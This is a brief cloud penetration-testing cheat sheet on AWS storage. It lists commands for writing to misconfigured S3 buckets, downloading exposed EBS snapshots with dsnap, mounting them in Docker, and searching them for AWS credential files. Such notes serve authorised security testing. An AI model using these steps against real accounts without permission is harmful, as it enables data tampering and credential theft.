Storage Enumeration & Exploitation

---

Once you know which buckets or volumes exist, try to retrieve or tamper with data. (See [[Discovery & Reconnaissance]])

S3 Buckets

---

Upload Objects (if the bucket is writable):

aws s3 cp <localfile> s3://<bucket-name>/

Bucket ACL or Policy Misconfiguration

aws s3api put-object --bucket <bucket-name> \
  --key "test.txt" --body "./test.txt"

If it succeeds, the bucket is world-writeable.

EBS Snapshot Exploitation

---

Identify accessible snapshots (See [[Discovery & Reconnaissance]]) Use dsnap to download:

dsnap --region <region> get <SNAPSHOT_ID>

Launch a Docker container to mount the disk image:

sudo IMAGE=<path/to/snapshot.img> make docker/run
# Example: sudo IMAGE=./snap-xxxxxx.img make docker/run

Inspect the mounted filesystem for AWS credentials in ~/.aws/credentials, config files, or environment files.